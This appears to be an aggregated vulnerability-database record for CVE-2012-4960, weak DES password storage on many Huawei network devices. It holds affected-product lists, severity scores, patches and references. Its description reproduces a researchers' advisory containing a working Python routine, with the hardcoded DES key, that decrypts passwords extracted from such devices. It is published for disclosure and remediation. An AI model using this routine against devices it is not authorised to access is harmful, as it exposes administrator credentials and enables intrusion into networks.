ID

VAR-201306-0006


CVE

CVE-2012-4960


TITLE

Huawei networking equipment weak password cipher

Trust: 0.8

sources: CERT/CC: VU#948096

DESCRIPTION

The Huawei NE5000E, MA5200G, NE40E, NE80E, ATN, NE40, NE80, NE20E-X6, NE20, ME60, CX600, CX200, CX300, ACU, WLAN AC 6605, S9300, S7700, S2300, S3300, S5300, S3300HI, S5300HI, S5306, S6300, S2700, S3700, S5700, S6700, AR G3, H3C AR(OEM IN), AR 19, AR 29, AR 49, Eudemon100E, Eudemon200, Eudemon300, Eudemon500, Eudemon1000, Eudemon1000E-U/USG5300, Eudemon1000E-X/USG5500, Eudemon8080E/USG9300, Eudemon8160E/USG9300, Eudemon8000E-X/USG9500, E200E-C/USG2200, E200E-X3/USG2200, E200E-X5/USG2200, E200E-X7/USG2200, E200E-C/USG5100, E200E-X3/USG5100, E200E-X5/USG5100, E200E-X7/USG5100, E200E-B/USG2100, E200E-X1/USG2100, E200E-X2/USG2100, SVN5300, SVN2000, SVN5000, SVN3000, NIP100, NIP200, NIP1000, NIP2100, NIP2200, and NIP5100 use the DES algorithm for stored passwords, which makes it easier for context-dependent attackers to obtain cleartext passwords via a brute-force attack. Huawei networking equipment use a DES encryption algorithm for password and encryption. DES is publicly known to be easily cracked. plural Huawei The product uses the stored password DES Because of the use of the algorithm, a vulnerability exists in which a plaintext password is obtained.Brute force attack by attacker (Brute force attack) You may be able to get a plaintext password via. Huawei is the world's leading provider of information and communication solutions. Huawei Quidway is a series of switches developed by Huawei. The Huawei CX600 is based on Huawei's mature VRP platform and has powerful routing, L2/L3 multicast, 5-level H-QoS, packet buffering, and ACL capabilities. Multiple Huawei products are prone to a weak password encryption weakness. Successful exploits may allow an attacker to decrypt stored passwords; this may aid in further attacks. The following are vulnerable: Huawei Quidway series Huawei CX600 V600R001 Huawei CX600 V600R003C00SPC900 Huawei ME60 V600R002C07 and prior versions AR 19/29/49 R2207 and prior versions. Weak password encryption on Huawei products =========================================== [ADVISORY INFORMATION] Title: Weak password encryption on Huawei products Release date: 13/11/2012 Credits: Roberto Paleari, Emaze Networks (roberto.paleari@emaze.net) Ivan Speziale, Emaze Networks (ivan.speziale@emaze.net) [VULNERABILITY INFORMATION] Class: Information disclosure [AFFECTED PRODUCTS] We confirm the presence of this security vulnerability on the following products: * Huawei Quidway series * Huawei CX600 Other models are probably also vulnerable, but they were not checked. As a consequence, passwords extracted from a victim's device can be deciphered instantaneously. A Python procedure that decodes a given password is included below. Upon termination, procedure decrypt_password() returns the clear-text password. <cut> from Crypto.Cipher import DES def decode_char(c): if c == 'a': r = '?' else: r = c return ord(r) - ord('!') def ascii_to_binary(s): assert len(s) == 24 out = [0]*18 i = 0 j = 0 for i in range(0, len(s), 4): y = decode_char(s[i + 0]) y = (y << 6) & 0xffffff k = decode_char(s[i + 1]) y = (y | k) & 0xffffff y = (y << 6) & 0xffffff k = decode_char(s[i + 2]) y = (y | k) & 0xffffff y = (y << 6) & 0xffffff k = decode_char(s[i + 3]) y = (y | k) & 0xffffff out[j+2] = chr(y & 0xff) out[j+1] = chr((y>>8) & 0xff) out[j+0] = chr((y>>16) & 0xff) j += 3 return "".join(out) def decrypt_password(p): r = ascii_to_binary(p) r = r[:16] d = DES.new("\x01\x02\x03\x04\x05\x06\x07\x08", DES.MODE_ECB) r = d.decrypt(r) return r.rstrip("\x00") </cut> [REMEDIATION] We recommend to store passwords using a proper hashing algorithm, instead of leveraging symmetric encryption. Further details are available at the following URL: http://support.huawei.com/enterprise/ReadLatestNewsAction.action?contentId=NEWS1000001141 [COPYRIGHT] Copyright(c) Emaze Networks S.p.A 2012, All rights reserved worldwide. Permission is hereby granted to redistribute this advisory, providing that no changes are made and that the copyright notices and disclaimers remain intact. [DISCLAIMER] Emaze Networks S.p.A is not responsible for the misuse of the information provided in our security advisories. These advisories are a service to the professional security community. There are NO WARRANTIES with regard to this information. Any application or distribution of this information constitutes acceptance AS IS, at the user's own risk. This information is subject to change without notice

Trust: 3.87

sources: NVD: CVE-2012-4960 // CERT/CC: VU#948096 // JVNDB: JVNDB-2012-006004 // CNVD: CNVD-2013-08074 // CNVD: CNVD-2012-6517 // BID: 56510 // VULHUB: VHN-58241 // PACKETSTORM: 118054

IOT TAXONOMY

category:['Network device']sub_category: -

Trust: 1.2

sources: CNVD: CNVD-2013-08074 // CNVD: CNVD-2012-6517

AFFECTED PRODUCTS

vendor:huaweimodel:acuscope:eqversion:v100r003c01spc100

Trust: 1.8

vendor:huaweimodel:acuscope:eqversion:v200r001c00

Trust: 1.8

vendor:huaweimodel:acuscope:eqversion:v200r001c00spc100

Trust: 1.8

vendor:huaweimodel:ar g3scope:eqversion:v200r001c00

Trust: 1.8

vendor:huaweimodel:ar g3scope:eqversion:v200r001c01

Trust: 1.8

vendor:huaweimodel:ar g3scope:eqversion:v200r002c00spc200

Trust: 1.8

vendor:huaweimodel:atnscope:eqversion:v200r001c00

Trust: 1.8

vendor:huaweimodel:atnscope:eqversion:v200r001c01

Trust: 1.8

vendor:huaweimodel:cx200scope:eqversion:v100r005

Trust: 1.8

vendor:huaweimodel:cx300scope:eqversion:v100r005

Trust: 1.8

vendor:huaweimodel:cx600scope:eqversion:v200r002

Trust: 1.8

vendor:huaweimodel:cx600scope:eqversion:v600r001

Trust: 1.8

vendor:huaweimodel:cx600scope:eqversion:v600r002

Trust: 1.8

vendor:huaweimodel:cx600scope:eqversion:v600r003

Trust: 1.8

vendor:huaweimodel:e200e-bscope:lteversion:v100r005c01

Trust: 1.8

vendor:huaweimodel:e200e-cscope:lteversion:v200r003c00

Trust: 1.8

vendor:huaweimodel:e200e-x1scope:lteversion:v100r005c01

Trust: 1.8

vendor:huaweimodel:e200e-x2scope:lteversion:v100r005c01

Trust: 1.8

vendor:huaweimodel:eudemon1000scope:lteversion:v200r006c02

Trust: 1.8

vendor:huaweimodel:eudemon1000e-uscope:lteversion:v200r001

Trust: 1.8

vendor:huaweimodel:eudemon1000e-xscope:lteversion:v200r002

Trust: 1.8

vendor:huaweimodel:eudemon100escope:eqversion:v200r007

Trust: 1.8

vendor:huaweimodel:eudemon200scope:eqversion:v200r001

Trust: 1.8

vendor:huaweimodel:eudemon300scope:lteversion:v200r006c02

Trust: 1.8

vendor:huaweimodel:eudemon500scope:lteversion:v200r006c02

Trust: 1.8

vendor:huaweimodel:eudemon8000e-xscope:lteversion:v200r001c00spc600

Trust: 1.8

vendor:huaweimodel:ma5200gscope:eqversion:v200r003

Trust: 1.8

vendor:huaweimodel:ma5200gscope:eqversion:v300r003

Trust: 1.8

vendor:huaweimodel:me60scope:eqversion:v100r005

Trust: 1.8

vendor:huaweimodel:me60scope:eqversion:v100r006

Trust: 1.8

vendor:huaweimodel:me60scope:eqversion:v600r002

Trust: 1.8

vendor:huaweimodel:me60scope:eqversion:v600r003

Trust: 1.8

vendor:huaweimodel:me60scope:eqversion:v600r005c00spc600

Trust: 1.8

vendor:huaweimodel:ne20scope:eqversion:v200r005

Trust: 1.8

vendor:huaweimodel:ne40scope:eqversion:v300r005

Trust: 1.8

vendor:huaweimodel:ne40escope:eqversion:v600r001

Trust: 1.8

vendor:huaweimodel:ne5000escope:eqversion:v300r007

Trust: 1.8

vendor:huaweimodel:ne5000escope:eqversion:v800r002

Trust: 1.8

vendor:huaweimodel:ne80scope:eqversion:v300r005

Trust: 1.8

vendor:huaweimodel:ne80escope:eqversion:v600r001

Trust: 1.8

vendor:huaweimodel:ne80escope:eqversion:v600r002

Trust: 1.8

vendor:huaweimodel:ne80escope:eqversion:v600r003

Trust: 1.8

vendor:huaweimodel:nip100scope:eqversion:v100r001

Trust: 1.8

vendor:huaweimodel:nip1000scope:eqversion:v100r001

Trust: 1.8

vendor:huaweimodel:nip200scope:eqversion:v100r001

Trust: 1.8

vendor:huaweimodel:nip2100scope:eqversion:v100r001c00

Trust: 1.8

vendor:huaweimodel:nip2200scope:eqversion:v100r001c00

Trust: 1.8

vendor:huaweimodel:nip5100scope:eqversion:v100r001c00

Trust: 1.8

vendor:huaweimodel:s2300scope:eqversion:v100r002

Trust: 1.8

vendor:huaweimodel:s2300scope:eqversion:v100r003

Trust: 1.8

vendor:huaweimodel:s2300scope:eqversion:v100r005

Trust: 1.8

vendor:huaweimodel:s2300scope:eqversion:v100r006

Trust: 1.8

vendor:huaweimodel:s2700scope:eqversion:v100r006

Trust: 1.8

vendor:huaweimodel:s3300scope:eqversion:v100r002

Trust: 1.8

vendor:huaweimodel:s3300scope:eqversion:v100r003

Trust: 1.8

vendor:huaweimodel:s3300scope:eqversion:v100r005

Trust: 1.8

vendor:huaweimodel:s3300scope:eqversion:v100r006

Trust: 1.8

vendor:huaweimodel:s3300hiscope:eqversion:v100r006

Trust: 1.8

vendor:huaweimodel:s3300hiscope:eqversion:v200r001

Trust: 1.8

vendor:huaweimodel:s3700scope:eqversion:v100r005

Trust: 1.8

vendor:huaweimodel:s3700scope:eqversion:v100r006

Trust: 1.8

vendor:huaweimodel:s3700scope:eqversion:v200r001

Trust: 1.8

vendor:huaweimodel:s5300scope:eqversion:v100r002

Trust: 1.8

vendor:huaweimodel:s5300scope:eqversion:v100r003

Trust: 1.8

vendor:huaweimodel:s5300scope:eqversion:v100r005

Trust: 1.8

vendor:huaweimodel:s5300scope:eqversion:v100r006

Trust: 1.8

vendor:huaweimodel:s5300hiscope:eqversion:v100r006

Trust: 1.8

vendor:huaweimodel:s5300hiscope:eqversion:v200r001

Trust: 1.8

vendor:huaweimodel:s5306scope:eqversion:v100r006

Trust: 1.8

vendor:huaweimodel:s5306scope:eqversion:v200r001

Trust: 1.8

vendor:huaweimodel:s5700scope:eqversion:v100r005

Trust: 1.8

vendor:huaweimodel:s5700scope:eqversion:v100r006

Trust: 1.8

vendor:huaweimodel:s5700scope:eqversion:v200r001

Trust: 1.8

vendor:huaweimodel:s6300scope:eqversion:v100r006

Trust: 1.8

vendor:huaweimodel:s6300scope:eqversion:v200r001

Trust: 1.8

vendor:huaweimodel:s6700scope:eqversion:v100r006

Trust: 1.8

vendor:huaweimodel:s6700scope:eqversion:v200r001

Trust: 1.8

vendor:huaweimodel:s7700scope:eqversion:v100r003

Trust: 1.8

vendor:huaweimodel:s7700scope:eqversion:v100r006

Trust: 1.8

vendor:huaweimodel:s9300scope:eqversion:v100r001

Trust: 1.8

vendor:huaweimodel:s9300scope:eqversion:v100r002

Trust: 1.8

vendor:huaweimodel:s9300scope:eqversion:v100r003

Trust: 1.8

vendor:huaweimodel:s9300scope:eqversion:v100r006

Trust: 1.8

vendor:huaweimodel:svn2000scope:eqversion:v200r001c00

Trust: 1.8

vendor:huaweimodel:svn3000scope:eqversion:v100r002c02spc802b041

Trust: 1.8

vendor:huaweimodel:svn5000scope:eqversion:v200r001c00

Trust: 1.8

vendor:huaweimodel:svn5300scope:eqversion:v100r001c01b019

Trust: 1.8

vendor:huaweimodel:wlan ac 6605scope:eqversion:v200r001c00

Trust: 1.8

vendor:huaweimodel:wlan ac 6605scope:eqversion:v200r001c00spc100

Trust: 1.8

vendor:huaweimodel:cx600scope: - version: -

Trust: 1.2

vendor:huaweimodel:e200x3scope:lteversion:v200r003c00

Trust: 1.0

vendor:huaweimodel:ar 19\/29\/49scope:lteversion:r2207

Trust: 1.0

vendor:huaweimodel:ne40e\/80escope:eqversion:v600r002

Trust: 1.0

vendor:huaweimodel:e200 usg5100scope:lteversion:v200r003c00

Trust: 1.0

vendor:huaweimodel:eudemon usg9300scope:lteversion:v100r003c00

Trust: 1.0

vendor:huaweimodel:h3c ar\scope:lteversion:r2209

Trust: 1.0

vendor:huaweimodel:ne20e-x6scope:eqversion:v300r005

Trust: 1.0

vendor:huaweimodel:ne40e\/80escope:eqversion:v600r003

Trust: 1.0

vendor:huaweimodel:eudemon 8160escope:lteversion:v100r003c00

Trust: 1.0

vendor:huaweimodel:eudemon usg9500scope:lteversion:v200r001c00spc600

Trust: 1.0

vendor:huaweimodel:eudemon usg5300scope:lteversion:v200r001

Trust: 1.0

vendor:huaweimodel:ne40escope:eqversion:v300r005

Trust: 1.0

vendor:huaweimodel:eudemon 8080escope:lteversion:v100r003c00

Trust: 1.0

vendor:huaweimodel:e200 usg2200scope:lteversion:v200r003c00

Trust: 1.0

vendor:huaweimodel:e200e-usg2100scope:lteversion:v100r005c01

Trust: 1.0

vendor:huaweimodel:eudemon usg5500scope:lteversion:v200r002

Trust: 1.0

vendor:huaweimodel:e200x5scope:lteversion:v200r003c00

Trust: 1.0

vendor:huaweimodel:e200x7scope:lteversion:v200r003c00

Trust: 1.0

vendor:huaweimodel: - scope: - version: -

Trust: 0.8

vendor:huaweimodel:ar 19/29/49scope:lteversion:r2207

Trust: 0.8

vendor:huaweimodel:e200e-x3scope:lteversion:v200r003c00

Trust: 0.8

vendor:huaweimodel:e200e-x5scope:lteversion:v200r003c00

Trust: 0.8

vendor:huaweimodel:e200e-x7scope:lteversion:v200r003c00

Trust: 0.8

vendor:huaweimodel:e200e/usg2100scope:lteversion:v100r005c01

Trust: 0.8

vendor:huaweimodel:e200e/usg2200scope:lteversion:v200r003c00

Trust: 0.8

vendor:huaweimodel:e200e/usg5100scope:lteversion:v200r003c00

Trust: 0.8

vendor:huaweimodel:eudemon8080escope:lteversion:v100r003c00

Trust: 0.8

vendor:huaweimodel:eudemon8160escope:lteversion:v100r003c00

Trust: 0.8

vendor:huaweimodel:eudemonusg5300scope:lteversion:v200r001

Trust: 0.8

vendor:huaweimodel:eudemonusg5500scope:lteversion:v200r002

Trust: 0.8

vendor:huaweimodel:eudemonusg9300scope:lteversion:v100r003c00

Trust: 0.8

vendor:huaweimodel:eudemonusg9500scope:lteversion:v200r001c00spc600

Trust: 0.8

vendor:huaweimodel:h3c arscope:lteversion:ar x9 series r2209

Trust: 0.8

vendor:huaweimodel:ne20e-x6scope:eqversion:v600r003

Trust: 0.8

vendor:huaweimodel:ne40escope:eqversion:v300r003

Trust: 0.8

vendor:huaweimodel:ne40escope:eqversion:v600r002

Trust: 0.8

vendor:huaweimodel:ne40escope:eqversion:v600r003

Trust: 0.8

vendor:huaweimodel:ne40e/80escope:eqversion:v300r003

Trust: 0.8

vendor:huaweimodel:ne40e/80escope:eqversion:v600r001

Trust: 0.8

vendor:huaweimodel:ne40e/80escope:eqversion:v600r002

Trust: 0.8

vendor:huaweimodel:ne40e/80escope:eqversion:v600r003

Trust: 0.8

vendor:huaweimodel:ne80escope:eqversion:v300r003

Trust: 0.8

vendor:huaweimodel:s2700scope:eqversion:v100r005

Trust: 0.8

vendor:huaweimodel:ne5000e v300r007scope: - version: -

Trust: 0.6

vendor:huaweimodel:ne5000e v800r002scope: - version: -

Trust: 0.6

vendor:huaweimodel:ma5200g v200r003scope: - version: -

Trust: 0.6

vendor:huaweimodel:ma5200g v300r003scope: - version: -

Trust: 0.6

vendor:huaweimodel:ne40e/80escope: - version: -

Trust: 0.6

vendor:huaweimodel:atn v200r001c00scope: - version: -

Trust: 0.6

vendor:huaweimodel:atn v200r001c01scope: - version: -

Trust: 0.6

vendor:huaweimodel:ne40/ne80 v300r005scope: - version: -

Trust: 0.6

vendor:huaweimodel:ne20e-x6 v600r003scope: - version: -

Trust: 0.6

vendor:huaweimodel:ne20 v200r005scope: - version: -

Trust: 0.6

vendor:huaweimodel:me60scope: - version: -

Trust: 0.6

vendor:huaweimodel:cx200/cx300 v100r005scope: - version: -

Trust: 0.6

vendor:huaweimodel:acu v100r003c01spc100scope: - version: -

Trust: 0.6

vendor:huaweimodel:acu v200r001c00spc100scope: - version: -

Trust: 0.6

vendor:huaweimodel:acu v200r001c00scope: - version: -

Trust: 0.6

vendor:huaweimodel:wlan ac v200r001c00scope:eqversion:6605

Trust: 0.6

vendor:huaweimodel:wlan ac v200r001c00spc100scope:eqversion:6605

Trust: 0.6

vendor:huaweimodel:s9300scope: - version: -

Trust: 0.6

vendor:huaweimodel:s7700scope: - version: -

Trust: 0.6

vendor:huaweimodel:s2300/s3300/s5300scope: - version: -

Trust: 0.6

vendor:huaweimodel:s2300/s3300/s5300/s2700/s3 v100r005scope: - version: -

Trust: 0.6

vendor:huaweimodel:s2300/s3300/s5300/s3300hi/ v100r006scope: - version: -

Trust: 0.6

vendor:huaweimodel:s3300hi/s5300hi/s5306/s630 v200r001scope: - version: -

Trust: 0.6

vendor:huaweimodel:ar g3 v200r001c00scope: - version: -

Trust: 0.6

vendor:huaweimodel:ar g3 v200r001c01scope: - version: -

Trust: 0.6

vendor:huaweimodel:ar g3 v200r002c00spc200scope: - version: -

Trust: 0.6

vendor:huaweimodel:h3c ar ar series r2209scope:lteversion:<=x9

Trust: 0.6

vendor:huaweimodel:ar r2207scope:eqversion:19/29/49<=

Trust: 0.6

vendor:huaweimodel:eudemon100e v200r007scope: - version: -

Trust: 0.6

vendor:huaweimodel:eudemon200 v200r001scope: - version: -

Trust: 0.6

vendor:huaweimodel:eudemon300&500&1000 v200r006c02scope:lteversion:<=

Trust: 0.6

vendor:huaweimodel:eudemon1000e-u/usg5300 v200r001scope:lteversion:<=

Trust: 0.6

vendor:huaweimodel:eudemon1000e-x/usg5500 v200r002scope:lteversion:<=

Trust: 0.6

vendor:huaweimodel:eudemon8080e&8160e/usg9300 v100r003c00scope:lteversion:<=

Trust: 0.6

vendor:huaweimodel:eudemon8000e-x/usg9500 v200r001c00spc600scope:lteversion:<=

Trust: 0.6

vendor:huaweimodel:e200e-c&x3&x5&x7/usg2200&5100 v200r003c00scope:lteversion:<=

Trust: 0.6

vendor:huaweimodel:e200e-b&x1&x2/usg2100 v100r005c01scope:lteversion:<=

Trust: 0.6

vendor:huaweimodel:svn5300 v100r001c01b019scope: - version: -

Trust: 0.6

vendor:huaweimodel:svn2000&5000 series v200r001c00scope: - version: -

Trust: 0.6

vendor:huaweimodel:svn3000 v100r002c02spc802b041scope: - version: -

Trust: 0.6

vendor:huaweimodel:nip100/200/1000 v100r001scope: - version: -

Trust: 0.6

vendor:huaweimodel:nip2100&2200&5100 v100r001c00scope: - version: -

Trust: 0.6

vendor:huaweimodel:quidway seriesscope: - version: -

Trust: 0.6

vendor:huaweimodel:quidway seriesscope:eqversion:0

Trust: 0.3

vendor:huaweimodel:me60 v600r002c07scope: - version: -

Trust: 0.3

vendor:huaweimodel:cx600 v600r003c00spc900scope: - version: -

Trust: 0.3

vendor:huaweimodel:cx600 v600r001scope: - version: -

Trust: 0.3

vendor:huaweimodel:ar r2207scope:eqversion:19/29/49

Trust: 0.3

vendor:huaweimodel:me60 v600r005c00spc900scope:neversion: -

Trust: 0.3

vendor:huaweimodel:cx600 v600r005c00spc900scope:neversion: -

Trust: 0.3

vendor:huaweimodel:cx600 v600r003c00spca00scope:neversion: -

Trust: 0.3

vendor:huaweimodel:ar r2209scope:neversion:19/29/49

Trust: 0.3

sources: CERT/CC: VU#948096 // CNVD: CNVD-2013-08074 // CNVD: CNVD-2012-6517 // BID: 56510 // JVNDB: JVNDB-2012-006004 // NVD: CVE-2012-4960

CVSS

SEVERITY

CVSSV2

CVSSV3

NVD: CVE-2012-4960
value: MEDIUM

Trust: 1.6

nvd@nist.gov: CVE-2012-4960
value: MEDIUM

Trust: 1.0

CNVD: CNVD-2013-08074
value: MEDIUM

Trust: 0.6

CNNVD: CNNVD-201306-403
value: MEDIUM

Trust: 0.6

VULHUB: VHN-58241
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2012-4960
severity: MEDIUM
baseScore: 6.5
vectorString: AV:N/AC:L/AU:S/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: SINGLE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 8.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

NVD: CVE-2012-4960
severity: MEDIUM
baseScore: 6.5
vectorString: NONE
accessVector: NETWORK
accessComplexity: LOW
authentication: SINGLE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 8.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.8

CNVD: CNVD-2013-08074
severity: MEDIUM
baseScore: 6.5
vectorString: AV:N/AC:L/AU:S/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: SINGLE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 8.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

VULHUB: VHN-58241
severity: MEDIUM
baseScore: 6.5
vectorString: AV:N/AC:L/AU:S/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: SINGLE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 8.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

sources: CERT/CC: VU#948096 // CNVD: CNVD-2013-08074 // VULHUB: VHN-58241 // JVNDB: JVNDB-2012-006004 // CNNVD: CNNVD-201306-403 // NVD: CVE-2012-4960

PROBLEMTYPE DATA

problemtype:CWE-310

Trust: 1.9

sources: VULHUB: VHN-58241 // JVNDB: JVNDB-2012-006004 // NVD: CVE-2012-4960

THREAT TYPE

remote

Trust: 1.2

sources: CNNVD: CNNVD-201211-280 // CNNVD: CNNVD-201306-403

TYPE

encryption problem

Trust: 1.2

sources: CNNVD: CNNVD-201211-280 // CNNVD: CNNVD-201306-403

CONFIGURATIONS

sources: JVNDB: JVNDB-2012-006004

EXPLOIT AVAILABILITY

sources: CERT/CC: VU#948096 // VULHUB: VHN-58241

PATCH

title:Huawei-SA-20120827-01-CX600url:http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-u_194373.htm

Trust: 0.8

title:Huawei multiple product encryption is not a strong vulnerability patchurl:https://www.cnvd.org.cn/patchInfo/show/34800

Trust: 0.6

title:Huawei patch for multiple product password encryption vulnerabilitiesurl:https://www.cnvd.org.cn/patchInfo/show/25088

Trust: 0.6

title:Huawei Fixing measures for vulnerabilities of encryption problems in many productsurl:http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=170984

Trust: 0.6

sources: CNVD: CNVD-2013-08074 // CNVD: CNVD-2012-6517 // JVNDB: JVNDB-2012-006004 // CNNVD: CNNVD-201306-403

EXTERNAL IDS

db:NVDid:CVE-2012-4960

Trust: 3.4

db:CERT/CCid:VU#948096

Trust: 2.7

db:BIDid:56510

Trust: 1.6

db:JVNid:JVNVU90202792

Trust: 0.8

db:JVNDBid:JVNDB-2012-006004

Trust: 0.8

db:PACKETSTORMid:118054

Trust: 0.7

db:CNVDid:CNVD-2013-08074

Trust: 0.6

db:CNVDid:CNVD-2012-6517

Trust: 0.6

db:CNNVDid:CNNVD-201211-280

Trust: 0.6

db:CNNVDid:CNNVD-201306-403

Trust: 0.6

db:EXPLOIT-DBid:38020

Trust: 0.1

db:VULHUBid:VHN-58241

Trust: 0.1

sources: CERT/CC: VU#948096 // CNVD: CNVD-2013-08074 // CNVD: CNVD-2012-6517 // VULHUB: VHN-58241 // BID: 56510 // JVNDB: JVNDB-2012-006004 // PACKETSTORM: 118054 // CNNVD: CNNVD-201211-280 // CNNVD: CNNVD-201306-403 // NVD: CVE-2012-4960

REFERENCES

url:http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-u_194373.htm

Trust: 2.3

url:http://www.kb.cert.org/vuls/id/948096

Trust: 1.9

url:about vulnerability notes

Trust: 0.8

url:contact us about this vulnerability

Trust: 0.8

url:provide a vendor statement

Trust: 0.8

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-4960

Trust: 0.8

url:http://jvn.jp/cert/jvnvu90202792/index.html

Trust: 0.8

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-4960

Trust: 0.8

url:http://packetstormsecurity.org/files/118054/huawei-weak-password-encryption.html

Trust: 0.6

url:http://www.securityfocus.com/bid/56510

Trust: 0.6

url:http://support.huawei.com/enterprise/readlatestnewsaction.action?contentid=news1000001141

Trust: 0.4

url:http://www.huawei.com/

Trust: 0.3

url:msg://bugtraq/201211130911.qad9ba1q022014@sf01web1.securityfocus.com

Trust: 0.3

sources: CERT/CC: VU#948096 // CNVD: CNVD-2013-08074 // CNVD: CNVD-2012-6517 // VULHUB: VHN-58241 // BID: 56510 // JVNDB: JVNDB-2012-006004 // PACKETSTORM: 118054 // CNNVD: CNNVD-201211-280 // CNNVD: CNNVD-201306-403 // NVD: CVE-2012-4960

CREDITS

Roberto Paleari and Ivan Speziale from Emaze Networks

Trust: 0.9

sources: BID: 56510 // CNNVD: CNNVD-201211-280

SOURCES

db:CERT/CCid:VU#948096
db:CNVDid:CNVD-2013-08074
db:CNVDid:CNVD-2012-6517
db:VULHUBid:VHN-58241
db:BIDid:56510
db:JVNDBid:JVNDB-2012-006004
db:PACKETSTORMid:118054
db:CNNVDid:CNNVD-201211-280
db:CNNVDid:CNNVD-201306-403
db:NVDid:CVE-2012-4960

LAST UPDATE DATE

2024-09-09T23:07:12.342000+00:00


SOURCES UPDATE DATE

db:CERT/CCid:VU#948096date:2013-10-03T00:00:00
db:CNVDid:CNVD-2013-08074date:2013-07-01T00:00:00
db:CNVDid:CNVD-2012-6517date:2012-11-16T00:00:00
db:VULHUBid:VHN-58241date:2013-08-22T00:00:00
db:BIDid:56510date:2015-03-19T08:28:00
db:JVNDBid:JVNDB-2012-006004date:2013-08-09T00:00:00
db:CNNVDid:CNNVD-201211-280date:2012-12-05T00:00:00
db:CNNVDid:CNNVD-201306-403date:2021-11-24T00:00:00
db:NVDid:CVE-2012-4960date:2013-08-22T03:59:17.713

SOURCES RELEASE DATE

db:CERT/CCid:VU#948096date:2013-08-05T00:00:00
db:CNVDid:CNVD-2013-08074date:2013-06-25T00:00:00
db:CNVDid:CNVD-2012-6517date:2012-11-16T00:00:00
db:VULHUBid:VHN-58241date:2013-06-20T00:00:00
db:BIDid:56510date:2012-11-13T00:00:00
db:JVNDBid:JVNDB-2012-006004date:2013-06-24T00:00:00
db:PACKETSTORMid:118054date:2012-11-13T23:22:55
db:CNNVDid:CNNVD-201211-280date:2012-11-16T00:00:00
db:CNNVDid:CNNVD-201306-403date:2013-06-26T00:00:00
db:NVDid:CVE-2012-4960date:2013-06-20T15:55:00.897